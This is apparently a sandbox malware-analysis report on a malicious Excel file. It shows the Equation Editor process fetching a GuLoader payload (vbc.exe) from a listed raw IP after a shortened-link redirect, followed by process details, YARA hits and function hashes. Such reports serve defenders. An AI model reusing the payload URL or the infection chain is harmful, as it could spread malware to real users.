Sep 14, 2021 12:17:18.421351910 CEST	17	IN	Data Raw: 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e d5 0d d3 89 8a 2c 0f 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e Data Ascii: ^^^^^^^^^^,^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^N=ON96BowPSvP5RcPSv%5O/iP3SvSvv+rfSO,kLYRSSSv
Sep 14, 2021 12:17:18.421369076 CEST	18	IN	Data Raw: 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e d7 93 08 31 96 98 d9 72 2e 74 50 c7 ed 33 43 50 Data Ascii: ^^^^^^^^^^^^^^^^^^^^^^1r.tP3CP%d4F2\qQvPPSQvP0d-F~]YnJTLGRS,wRc?dK5FR,RvPk=LRXLR6;+CDeH053V2S
Sep 14, 2021 12:17:18.421391010 CEST	19	IN	Data Raw: d2 8c 5f 7c b4 7f db 7a a9 77 50 c7 d7 91 b8 49 3e 76 50 99 b8 3e 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 Data Ascii: _\|zwPI>vP>^^^^^^^^^^^^^^^^^^^^^^^^ncOy(vP\|j35OFMMFGY2QSO"K+RvP{FQS@$+RvPQS\|rp\)Svm+SKi%P_C0PnKk`iy(vPDrRtP#
Sep 14, 2021 12:17:18.421411991 CEST	21	IN	Data Raw: c5 bf 52 76 50 a1 a4 b1 25 fb 3b ed 49 7f 51 f7 64 e3 e5 af 6c 45 d2 42 74 fe 74 7e b8 a1 6a b4 d1 eb 77 62 af 4f 3b f5 97 c3 da e3 2b c5 53 76 d9 3d 01 fd c5 bc 51 76 50 af ee a5 77 4e d2 5a 74 63 bc 5c e2 2c 0f 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 Data Ascii: RvP%;IQdlEBtt~jwbO;+Sv=QvPwNZtc\,^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^8VwF7T"E;dtW7Bt3FR65%5/rvPSvR
Sep 14, 2021 12:17:18.421433926 CEST	22	IN	Data Raw: 17 79 ac 08 d3 02 5f 3b dc f6 14 c8 af 39 d0 b3 5c 8a bd 01 17 79 ae 4b d3 02 5f 39 07 f6 24 c8 ad 58 c0 43 8b f6 14 c8 ad 0b d9 5a 94 77 50 c7 da 8d 03 30 95 73 ff 28 e0 fd cd 00 52 76 50 2f 80 7d 50 c7 ba 33 10 c7 53 f2 bf 47 aa 87 d9 2f 35 4f Data Ascii: y_;9\yK_9$XCZwP0s(RvP/}P3SG/5OvPbSv60bSv:;vdkw:*`\|pGSwPJFvQS'RvPb7,^^^^^^^^^^^^^^^^^^^^^^
Sep 14, 2021 12:17:18.421457052 CEST	23	IN	Data Raw: 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b 5e 07 0b a1 6a bc d1 36 52 67 c0 70 d2 b7 e6 a8 32 68 68 cf d8 fb 5c c5 53 76 5f 42 28 89 af 38 da eb d7 c6 53 76 d9 0c 00 fd cd 40 52 76 50 31 91 88 d9 4a d3 77 50 c7 Data Ascii: ^^^^^^^^^j6Rgp2hh\Sv_B(8Sv@RvP1JwPLQSNov-PSvJwPLQSfSvszvPR6BTXB_t\\i2_$Q\t\tCQvPN&Sv6BQvPNQSNN<LQSSvR

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	151.101.65.195	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
2021-09-14 10:17:17 UTC	0	OUT	GET /4GZv HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: ggle.io Connection: Keep-Alive
2021-09-14 10:17:18 UTC	0	IN	HTTP/1.1 302 Found Connection: close Content-Length: 53 Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Methods: GET Access-Control-Allow-Origin: * Access-Control-Max-Age: 3666 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Content-Type: text/plain; charset=utf-8 Expires: 0 Function-Execution-Id: p8xahgil8nqu Location: http://23.95.85.181/msn/vbc.exe Pragma: no-cache Referer: ggle.io Server: Google Frontend X-Cloud-Trace-Context: 4496f6c0e9f1195e2c77dbf7bc1904e8;o=1 X-Country-Code: CH X-Powered-By: Express Accept-Ranges: bytes Date: Tue, 14 Sep 2021 10:17:18 GMT X-Served-By: cache-hhn4072-HHN X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1631614638.717716,VS0,VE318 Vary: Origin, Accept,cookie,need-authorization, x-fh-requested-host, accept-encoding
2021-09-14 10:17:18 UTC	1	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 35 2e 38 35 2e 31 38 31 2f 6d 73 6e 2f 76 62 63 2e 65 78 65 Data Ascii: Found. Redirecting to http://23.95.85.181/msn/vbc.exe

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2012 Parent PID: 596

General

Start time:	12:16:21
Start date:	14/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f280000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2840 Parent PID: 596

General

Start time:	12:16:44
Start date:	14/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2664 Parent PID: 2840

General

Start time:	12:16:48
Start date:	14/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	4399C694E88F3F32D22D91C6C4A173ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 28%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 1412 Parent PID: 2664

General

Start time:	12:17:57
Start date:	14/09/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	73728 bytes
MD5 hash:	4399C694E88F3F32D22D91C6C4A173ED
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2664 Parent PID: 2840 vbc.exeCOMMON

Executed Functions

Function 02350DC2, Relevance: 22.7, APIs: 4, Strings: 8, Instructions: 1732COMMON

Download Yara Rule

Strings

-ly}, xrefs: 0235129B
?v., xrefs: 0235126E
\sj!, xrefs: 02351840
Tdw+, xrefs: 02354A53
t*5., xrefs: 023513A6
okT, xrefs: 0235158E
]\9N, xrefs: 02350825
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: -ly}$?v.$Tdw+$YTV$\sj!$]\9N$okT$t*5.
API String ID: 2167126740-1515933081
Opcode ID: 5a98712ef219d2030cc50592d0e38c7edae0908a6718ef718c8a680fd80f7114
Instruction ID: 2b57314140009c0f3736f3686c46b00be0b399accfb7d163a8a5e15f6158a9d0
Opcode Fuzzy Hash: 5a98712ef219d2030cc50592d0e38c7edae0908a6718ef718c8a680fd80f7114
Instruction Fuzzy Hash: 75F221B26043998FDB349F39CD85BEABBB2AF49350F55412DDC8D9B215D3348A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02350D57, Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 472COMMON

Download Yara Rule

Strings

-ly}, xrefs: 0235129B
?v., xrefs: 0235126E
t*5., xrefs: 023513A6
okT, xrefs: 0235158E

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: -ly}$?v.$okT$t*5.
API String ID: 2616484454-2969063634
Opcode ID: 59dc346d9fcac99ee58abde0a7db0768a67392812e47e3bd1e589df08e3f2f74
Instruction ID: f2f9533d5c0997fa61b8566f28bebab720b8fad0aac7eafb11ee310cac6f6a84
Opcode Fuzzy Hash: 59dc346d9fcac99ee58abde0a7db0768a67392812e47e3bd1e589df08e3f2f74
Instruction Fuzzy Hash: C01255756083998FDB349F39C894BEE7BB2AF45350F55411ECC8D8B255C7349A86CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02350F0A, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 387COMMON

Download Yara Rule

Strings

-ly}, xrefs: 0235129B
?v., xrefs: 0235126E
t*5., xrefs: 023513A6
okT, xrefs: 0235158E

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -ly}$?v.$okT$t*5.
API String ID: 0-2969063634
Opcode ID: 7fc0765b2717bc5779930ab732064b85238a28d63bbfc3979386210b50604406
Instruction ID: c2286535e37aa5dd8d480a27e99c6bec25527182fb856a483839048323b30e94
Opcode Fuzzy Hash: 7fc0765b2717bc5779930ab732064b85238a28d63bbfc3979386210b50604406
Instruction Fuzzy Hash: 8EE177356083958FDB349F39C895BEEBBB2AF45360F95461DCC8D9B255C3348A82CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02351046, Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 348COMMON

Download Yara Rule

Strings

-ly}, xrefs: 0235129B
?v., xrefs: 0235126E
t*5., xrefs: 023513A6
okT, xrefs: 0235158E

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -ly}$?v.$okT$t*5.
API String ID: 0-2969063634
Opcode ID: 90cb16d5bdf5bfb5efb79090d79982181679d5aac533337a18ac4e10ddccc7b3
Instruction ID: 8a10bc53ce5e9f251eb8a3461dbaffed1519dc62a3d76c443429fb96d765c40c
Opcode Fuzzy Hash: 90cb16d5bdf5bfb5efb79090d79982181679d5aac533337a18ac4e10ddccc7b3
Instruction Fuzzy Hash: 5DD156366087959FDB309F39C895BEABBB2AF46360F45451DCCCD9B655C3308A82CB02

Uniqueness

Uniqueness Score: -1.00%

Function 023511B6, Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 273COMMON

Download Yara Rule

Strings

-ly}, xrefs: 0235129B
?v., xrefs: 0235126E
t*5., xrefs: 023513A6
okT, xrefs: 0235158E

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: -ly}$?v.$okT$t*5.
API String ID: 0-2969063634
Opcode ID: ba4c243b88a90fc1417f44aa58101f624fe0064e3a23da016a670cd3ad9f0c63
Instruction ID: 7565b0b4a780750639c743463f9a9a32e0b8656aca06a743ebf72ecb2f61ae41
Opcode Fuzzy Hash: ba4c243b88a90fc1417f44aa58101f624fe0064e3a23da016a670cd3ad9f0c63
Instruction Fuzzy Hash: DDB179365097959FCB308F38C885BEABBB2AF46364F45464DCDCD9B655C3748682CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02358376, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 959COMMON

Download Yara Rule

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: Tdw+$YTV
API String ID: 1029625771-2776546355
Opcode ID: f6d223d97849bc524d1390636273b0d871ed6418acc5b404944bf9440b8f64ab
Instruction ID: 18eb0c45ae0faabb14563e40df60af40be69d1e6a4ca4c5fa9b9a47b215d718d
Opcode Fuzzy Hash: f6d223d97849bc524d1390636273b0d871ed6418acc5b404944bf9440b8f64ab
Instruction Fuzzy Hash: 1D92FFB16043999FDB749F28C995BEABBB2FF48350F45812DDD8D9B210D3309A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02351328, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?), ref: 02351430

Strings

t*5., xrefs: 023513A6
okT, xrefs: 0235158E

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleService
String ID: okT$t*5.
API String ID: 1725840886-531269248
Opcode ID: b779866e6f2cb24223c31f450b02a973062665d2174854eeb314473c44f30676
Instruction ID: 9a4b75fcb707cf41a5781b9298f78515a1aca1b08434a2d51fa9cf4679cc9575
Opcode Fuzzy Hash: b779866e6f2cb24223c31f450b02a973062665d2174854eeb314473c44f30676
Instruction Fuzzy Hash: 588168355097959FDB318F38C894BEABBA2AF46364F95464DCCCD8BA51C374C682CB02

Uniqueness

Uniqueness Score: -1.00%

Function 023512DC, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(?), ref: 02351430

Strings

t*5., xrefs: 023513A6
okT, xrefs: 0235158E

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: CloseHandleService
String ID: okT$t*5.
API String ID: 1725840886-531269248
Opcode ID: 806d7e96e62183ad811ac0e95214b9978e7ded8b97efc72cf25931f5dbb6ffc2
Instruction ID: 36b69e860bfa2e68a87c4dc2937b66b6c3c6394b67cd709d9eb060b648c47982
Opcode Fuzzy Hash: 806d7e96e62183ad811ac0e95214b9978e7ded8b97efc72cf25931f5dbb6ffc2
Instruction Fuzzy Hash: A6716736A083959FDB309E38C894BEEB7B1AF56394F45821DCC8D9B655C7348682CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02353793, Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 799COMMON

Download Yara Rule

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Tdw+$YTV
API String ID: 0-2776546355
Opcode ID: e9ddc2bce4f80cdfbdd8e2b13e4e51baee9f7852ff60686dc706c13093f2c383
Instruction ID: b6134c14e20f2e298fb167987a9ba3d72e5b1eb747f69ff00979e3b8e0a16766
Opcode Fuzzy Hash: e9ddc2bce4f80cdfbdd8e2b13e4e51baee9f7852ff60686dc706c13093f2c383
Instruction Fuzzy Hash: 9C72CDB26043899FDB749F28CD95BDABBB2FF49350F45412DDC8DAB210D3705A858B81

Uniqueness

Uniqueness Score: -1.00%

Function 02354559, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 691nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02357766: LoadLibraryA.KERNEL32(?,?,?,02355DDF,00000000,?,-0A13EEA5,02355E77,00000000,?,?,023502B2,4993944C,02356D31,00000000,02350266), ref: 023578A0

NtWriteVirtualMemory.NTDLL(?,129AB9BF,?,00000000,?,?,?,?,-74C4B975), ref: 023552A3

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: Tdw+$YTV
API String ID: 3569954152-2776546355
Opcode ID: 92c8c39bd81a811113f4c1c3d890e18c078ed1ddff77b8b54aa7d2010061c851
Instruction ID: 3eb7762fa035076ba94f565e68f46726aa031016acff8983fd31c554798dbff3
Opcode Fuzzy Hash: 92c8c39bd81a811113f4c1c3d890e18c078ed1ddff77b8b54aa7d2010061c851
Instruction Fuzzy Hash: 1752DCB26043899FDB749F39C995BDABBB2FF59340F41812DDD899B220D3705A818B81

Uniqueness

Uniqueness Score: -1.00%

Function 023544E2, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 689COMMON

Download Yara Rule

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Tdw+$YTV
API String ID: 0-2776546355
Opcode ID: 2440a5e1f0b9de56e0dcfbde20e20242a228ef16a0d8a49d85ac7818b38f1814
Instruction ID: d48e39600974e3973c8ddd4dade0222a7be4bad0e52a30cec97b485a668d5707
Opcode Fuzzy Hash: 2440a5e1f0b9de56e0dcfbde20e20242a228ef16a0d8a49d85ac7818b38f1814
Instruction Fuzzy Hash: 6B520FB26083898FDB749F35C985BDABBB2BF45350F45812DDD8D9B620D3709A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02357B4F, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 680COMMON

Download Yara Rule

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Tdw+$YTV
API String ID: 0-2776546355
Opcode ID: 352c94670d3985c1730d33ae83310e88d76763f46663bb281eeaaf1e5752ca80
Instruction ID: 943d4492f3f94ae023292ab606f52b2e677172348156f70dc57dba56ca99ae60
Opcode Fuzzy Hash: 352c94670d3985c1730d33ae83310e88d76763f46663bb281eeaaf1e5752ca80
Instruction Fuzzy Hash: 7752ECB26043499FDB749F38C995BEABBB2FF59350F41812DDD8D9B220D3705A818B81

Uniqueness

Uniqueness Score: -1.00%

Function 0235464E, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 643COMMON

Download Yara Rule

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Tdw+$YTV
API String ID: 0-2776546355
Opcode ID: bc799bd2ba9d4f4fab44c24f5aa579569e74c1a46eb9a7a5b695abdf34202149
Instruction ID: 07aec40d4241d137c50ca540ce05275452d2b3e4c1253d9b3ea7db67c6b427bc
Opcode Fuzzy Hash: bc799bd2ba9d4f4fab44c24f5aa579569e74c1a46eb9a7a5b695abdf34202149
Instruction Fuzzy Hash: A1520DB26083898FDB749F34C985BDABBB2BF49350F45412DDD8D9B620D3709A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 023547BA, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 576COMMON

Download Yara Rule

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Tdw+$YTV
API String ID: 0-2776546355
Opcode ID: df6b0f5a1406c7524a45a8a208b2c9f49ff4c9027c88af4e2498259b56e3b164
Instruction ID: 17e348bc78c139ae6bd6413cb67b50676ea470cd63425e2fd8299a6fbbbc2cbd
Opcode Fuzzy Hash: df6b0f5a1406c7524a45a8a208b2c9f49ff4c9027c88af4e2498259b56e3b164
Instruction Fuzzy Hash: E442ECB16083899FDB749F34C995BDABBB2BF49350F45812DDD8D9B220D3709A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02354932, Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 509COMMON

Download Yara Rule

Strings

Tdw+, xrefs: 02354A53
YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Tdw+$YTV
API String ID: 0-2776546355
Opcode ID: 1f126223230fefbca7408e75bc22e8bf18fa5b46cbb470a72563f70032ec7146
Instruction ID: 7ae689c9fb32cfd6a527aa50cc607fd36d82b069dbec2725bcdf247b018f2fdd
Opcode Fuzzy Hash: 1f126223230fefbca7408e75bc22e8bf18fa5b46cbb470a72563f70032ec7146
Instruction Fuzzy Hash: 2522FEB25083899FDB748F35C985BDABBB2BF45350F45822DDD8D9B620D3709A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02355B9A, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 287memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02357766: LoadLibraryA.KERNEL32(?,?,?,02355DDF,00000000,?,-0A13EEA5,02355E77,00000000,?,?,023502B2,4993944C,02356D31,00000000,02350266), ref: 023578A0

NtAllocateVirtualMemory.NTDLL ref: 02355D34

Strings

]\9N, xrefs: 02350825

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: ]\9N
API String ID: 2616484454-3798285978
Opcode ID: 194c62ff04aef27d2a122d67a578486fbb179f90360bb3e1e722d3a500a61b03
Instruction ID: 573c2fe1a10f0962016d8243f0a199f1606083ae01ce19061dc0ce459f3b726b
Opcode Fuzzy Hash: 194c62ff04aef27d2a122d67a578486fbb179f90360bb3e1e722d3a500a61b03
Instruction Fuzzy Hash: DDB1EDB26043548FDB74AF75D884BEEB7A2EF58350F55442EEC8D9B214D3309A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 023599A3, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

n, xrefs: 023599C3

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: n
API String ID: 0-2013832146
Opcode ID: eeae113a94508c81e3a701f210759e1b38c0448ca4d44cf0e9916531c75be71b
Instruction ID: b24b878daae0e4a3035d3df8e9e6b8b2d0a3550c84623321d25b0bd3432afe3e
Opcode Fuzzy Hash: eeae113a94508c81e3a701f210759e1b38c0448ca4d44cf0e9916531c75be71b
Instruction Fuzzy Hash: 94A1BB71A04698CFDF79DF28C994BEA7BA2AF94310F50812ADC0E9F354D7349A41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 023506C1, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

EnumWindows.USER32(023507C7,?,00000000), ref: 023506F4

Strings

]\9N, xrefs: 02350825

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: ]\9N
API String ID: 1129996299-3798285978
Opcode ID: a2d922efb0017fbfc6be291398572a3c2a151047547400f9064a52c8a389c8ac
Instruction ID: 578a234c6a78b4ca53a92fbfdf3b050268d434dd9daf948de4c8bd169d7ee4cf
Opcode Fuzzy Hash: a2d922efb0017fbfc6be291398572a3c2a151047547400f9064a52c8a389c8ac
Instruction Fuzzy Hash: E891EFB2A043648FDB74AF64CC44BEE77A6AF98360F55452EEC8D9B604D7309A41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02352F36, Relevance: 4.5, Strings: 3, Instructions: 771COMMON

Download Yara Rule

Strings

>av&, xrefs: 023534ED
]\9N, xrefs: 02350825
Yt`, xrefs: 0235308D

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: >av&$Yt`$]\9N
API String ID: 1029625771-610402317
Opcode ID: 2bca23b9800cdfbbb780762e9c267e881e3a7b646fa3c507f1254b17062edf5a
Instruction ID: 925e6fc9d7e076a22af11125e8a5600551799b4ba1e547d74a3f7ba0327767ce
Opcode Fuzzy Hash: 2bca23b9800cdfbbb780762e9c267e881e3a7b646fa3c507f1254b17062edf5a
Instruction Fuzzy Hash: C5628BB1A047599FDB349F28CC94BEAB7A6FF48350F45422ADC8D9B301D730AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0040135C, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 563COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401361

Strings

VB5!6&*, xrefs: 0040135C

Memory Dump Source

Source File: 00000006.00000002.618539941.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.618535617.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.618554057.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.618558555.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: ff7db081d57d242a6ba5c43cf60eef5e4cbaa9bb7980516aca3e0798dd13d77c
Instruction ID: 54f89d3c20f84e34fd436e83056b2437bb51e4be56a25fd8872d730506a2683f
Opcode Fuzzy Hash: ff7db081d57d242a6ba5c43cf60eef5e4cbaa9bb7980516aca3e0798dd13d77c
Instruction Fuzzy Hash: CB029A3104E3D18FDB178B74C9A26A17FB0EE1332431945EBC4C29F5B7D229285ADB66

Uniqueness

Uniqueness Score: -1.00%

Function 02354AAC, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 439COMMON

Download Yara Rule

Strings

YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: YTV
API String ID: 0-1774803758
Opcode ID: f06910f7dabf5282846c23caf456ba1deeedfb5f97ae745d861eb2963c713814
Instruction ID: d5b98b927694a2289faf50bda5b0bde83c0a19c7a276bb42ab63799ee22fbe3d
Opcode Fuzzy Hash: f06910f7dabf5282846c23caf456ba1deeedfb5f97ae745d861eb2963c713814
Instruction Fuzzy Hash: 1412D9B26083898FDB759F38CD95BDA7BB2AF49350F45412DDD8D9B220D3709A818B81

Uniqueness

Uniqueness Score: -1.00%

Function 02354C22, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 376COMMON

Download Yara Rule

Strings

YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: YTV
API String ID: 0-1774803758
Opcode ID: 0815ee75451f8a4691d3a82a5fe2c467472c9a09ae60e64eb95fb913f5dd7298
Instruction ID: 9220fd97da41486890a7ff8ac733aff034cf0c7e926683dc3a238e4c1f807b90
Opcode Fuzzy Hash: 0815ee75451f8a4691d3a82a5fe2c467472c9a09ae60e64eb95fb913f5dd7298
Instruction Fuzzy Hash: 87F1FBB26083889FDB759F24CD85BDA7BB2BF49350F45412EDD8D9B220D3709A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02354D92, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 313COMMON

Download Yara Rule

Strings

YTV, xrefs: 023553B0

Memory Dump Source

Source File: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false

Yara matches

Similarity

API ID:
String ID: YTV
API String ID: 0-1774803758
